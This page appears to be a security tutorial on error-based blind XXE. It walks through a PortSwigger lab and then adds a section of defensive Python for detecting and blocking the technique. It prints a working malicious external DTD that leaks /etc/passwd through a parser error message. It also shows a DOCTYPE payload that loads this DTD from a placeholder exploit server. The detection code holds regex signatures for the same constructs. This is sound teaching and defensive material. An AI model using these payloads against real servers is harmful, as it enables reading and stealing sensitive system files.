
Blind XXE to LFI


Last updated 2 years ago

An alternative approach to exploiting a blind XXE vulnerability is to trigger an XML parsing error.

  • If the parser's error message includes the sensitive data, this technique is effective whenever that error message is shown in the application's response.

We can trigger an XML parsing error whose message contains the contents of the /etc/passwd file by using a malicious external DTD:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
  • Declares an XML parameter entity called file, whose value is the contents of /etc/passwd.

  • Declares an XML parameter entity called eval, which dynamically declares another parameter entity called error. The error entity is defined to load a non-existent file whose name contains the value of the file entity. (The &#x25; character reference stands for %, since a literal % cannot appear inside an entity value in an external DTD.)

  • References the eval entity, which causes the dynamic declaration of the error entity to be performed.

  • References the error entity, so the parser attempts to load the non-existent file.

The result is a parsing error message containing the name of the non-existent file, which in turn contains the contents of /etc/passwd.

PortSwigger Exercises

Create a malicious external DTD, host it on your exploit server, and save it:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Now insert an XML statement invoking the external DTD, as usual:

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://YOUR-EXPLOIT-DTD"> %xxe;]>

We can see that the response now contains the contents of /etc/passwd, carried inside the parsing error message.
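As an added defender-side example (not part of the original page or PortSwigger's material), the helpers below flag the DTD constructs that the error-based technique above depends on, and show a parser that refuses any DOCTYPE outright, which is the standard mitigation. The two payloads from this page and one benign request are embedded as constructed samples.

```python
# Added detection and hardening helpers (not from the original page): they
# flag the DTD constructs used by the error-based technique above and show a
# parser that refuses any DOCTYPE. Sample inputs are constructed.
import re
import xml.parsers.expat

# Constructed samples: the two payloads shown above and one benign request.
EXTERNAL_DTD = """<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;"""
DOCTYPE_PAYLOAD = ('<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://YOUR-EXPLOIT-DTD"> '
                   '%xxe;]><d0p/>')
BENIGN_XML = '<?xml version="1.0"?><stockCheck><productId>1</productId></stockCheck>'

# Signatures of the technique: a DOCTYPE, a parameter entity declaration, an
# external identifier carrying a URI scheme, a parameter-entity reference, and
# the encoded '%' that nests one declaration inside another.
SIGNATURES = {
    "doctype": re.compile(r"<!DOCTYPE\b", re.I),
    "parameter_entity": re.compile(r"<!ENTITY\s+%", re.I),
    "external_system_id": re.compile(r"SYSTEM\s+['\"][a-z][a-z0-9+.-]*:", re.I),
    "parameter_entity_reference": re.compile(r"%[A-Za-z_][\w.-]*;"),
    "encoded_percent": re.compile(r"&#(?:x25|37);", re.I),
}

def xxe_indicators(text):
    """Return the signature names present in an XML body or a fetched DTD."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

class DoctypeRejected(ValueError):
    """Raised when a document carries a DTD, which this parser never accepts."""

def parse_without_dtd(data):
    """Parse XML, aborting on the first DOCTYPE, and return the root tag name.
    Refusing DTDs entirely is the mitigation: no entity is ever declared, so
    neither the external DTD fetch nor the error-based file read can happen."""
    root = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected("DOCTYPE %r is not allowed" % name)

    def on_start(tag, attrs):
        if not root:
            root.append(tag)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.Parse(data, True)  # an exception raised in a handler propagates out of Parse
    return root[0]
```

Running xxe_indicators over request bodies (and over any DTD a server was made to fetch) gives a log-side signal, while parse_without_dtd is the in-application fix.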